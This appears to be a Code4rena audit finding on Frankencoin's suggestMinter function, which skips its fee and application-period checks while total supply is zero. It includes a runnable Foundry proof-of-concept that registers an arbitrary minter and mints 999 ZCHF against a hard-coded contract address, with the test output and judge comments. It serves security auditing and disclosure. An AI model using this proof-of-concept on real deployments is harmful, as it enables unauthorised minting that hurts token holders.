Platform: Code4rena
Start Date: 12/04/2023
Pot Size: $60,500 USDC
Total HM: 21
Participants: 199
Period: 7 days
Judge: hansfriese
Total Solo HM: 5
Id: 231
League: ETH
Rank: 161/199
Findings: 1
Award: $22.60
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: juancito
Also found by: 0xAgro, 0xNorman, 0xSmartContract, 0xStalin, 0xTheC0der, 0xWaitress, 0xhacksmithh, 0xnev, 3dgeville, 8olidity, Arz, Aymen0909, BGSecurity, BRONZEDISC, Bauchibred, Bauer, BenRai, ChainHunters, ChrisTina, CodeFoxInc, DedOhWale, DishWasher, EloiManuel, IceBear, Inspex, Jorgect, Kaysoft, LeoGold, LewisBroadhurst, Madalad, MiloTruck, MohammedRizwan, Nyx, Polaris_tow, RaymondFam, SaharDevep, SanketKogekar, Sathish9098, SolidityATL, Udsen, W0RR1O, aria, ayden, berlin-101, bin2chen, catellatech, codeslide, crc32, decade, descharre, evmboi32, eyexploit, fatherOfBlocks, georgits, giovannidisiena, joestakey, karanctf, kodyvim, ltyu, lukris02, m9800, matrix_0wl, mov, mrpathfindr, nadin, niser93, p0wd3r, parlayan_yildizlar_takimi, pavankv, pontifex, qpzm, ravikiranweb3, rbserver, santipu_, shealtielanz, slvDev, tnevler, wonjun, xmxanuel, yixxas
22.6007 USDC - $22.60
https://github.com/code-423n4/2023-04-frankencoin/blob/main/contracts/Frankencoin.sol#L84
https://github.com/code-423n4/2023-04-frankencoin/blob/main/contracts/Frankencoin.sol#L85
function suggestMinter(address _minter, uint256 _applicationPeriod, uint256 _applicationFee, string calldata _message) override external { if (_applicationPeriod < MIN_APPLICATION_PERIOD && totalSupply() > 0) revert PeriodTooShort(); if (_applicationFee < MIN_FEE && totalSupply() > 0) revert FeeTooLow(); if (minters[_minter] != 0) revert AlreadyRegistered(); _transfer(msg.sender, address(reserve), _applicationFee); minters[_minter] = block.timestamp + _applicationPeriod; emit MinterApplied(_minter, _applicationPeriod, _applicationFee, _message); }
It is possible to Mint ZCHF when contract just created and NO ZCHF has been minted.
So attacker can mint tokens and ruin the contract
https://github.com/code-423n4/2023-04-frankencoin/blob/main/contracts/Frankencoin.sol#L83
// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import "../contracts/test/Strings.sol"; import "../contracts/test/TestToken.sol"; import "../contracts/IERC20.sol"; import "../contracts/Equity.sol"; import "../contracts/IReserve.sol"; import "../contracts/IFrankencoin.sol"; import "../contracts/Ownable.sol"; import "../contracts/Position.sol"; import "../contracts/IPosition.sol"; import "../contracts/MintingHub.sol"; import "../contracts/PositionFactory.sol"; import "../contracts/StablecoinBridge.sol"; import "forge-std/Test.sol"; import "forge-std/console.sol"; contract GeneralTest is Test { IFrankencoin zchf; User alice; User bob; address junan; constructor(){ zchf = Frankencoin(0x7a787023f6E18f979B143C79885323a24709B0d8); junan = address(0x1234); } function testTets() public { console.log("block number: ",block.number); vm.startPrank(junan); console.log("junan's token before mint:",zchf.balanceOf(junan)); zchf.suggestMinter(junan, 0, 0, ""); zchf.mint(junan, 999 ether, 0, 0); console.log("junan's token after mint:",zchf.balanceOf(junan)); vm.stopPrank(); } }
Compiler run successful Running 1 test for test/GeneralTest.t.sol:GeneralTest [PASS] testTets() (gas: 106067) Logs: block number: 17079780 junan's token before mint: 0 junan's token after mint: 999000000000000000000
Foundry forge
#0 - 0xA5DF
2023-04-27T09:42:57Z
Dupe of #921
#1 - c4-judge
2023-05-18T05:52:40Z
hansfriese marked the issue as grade-b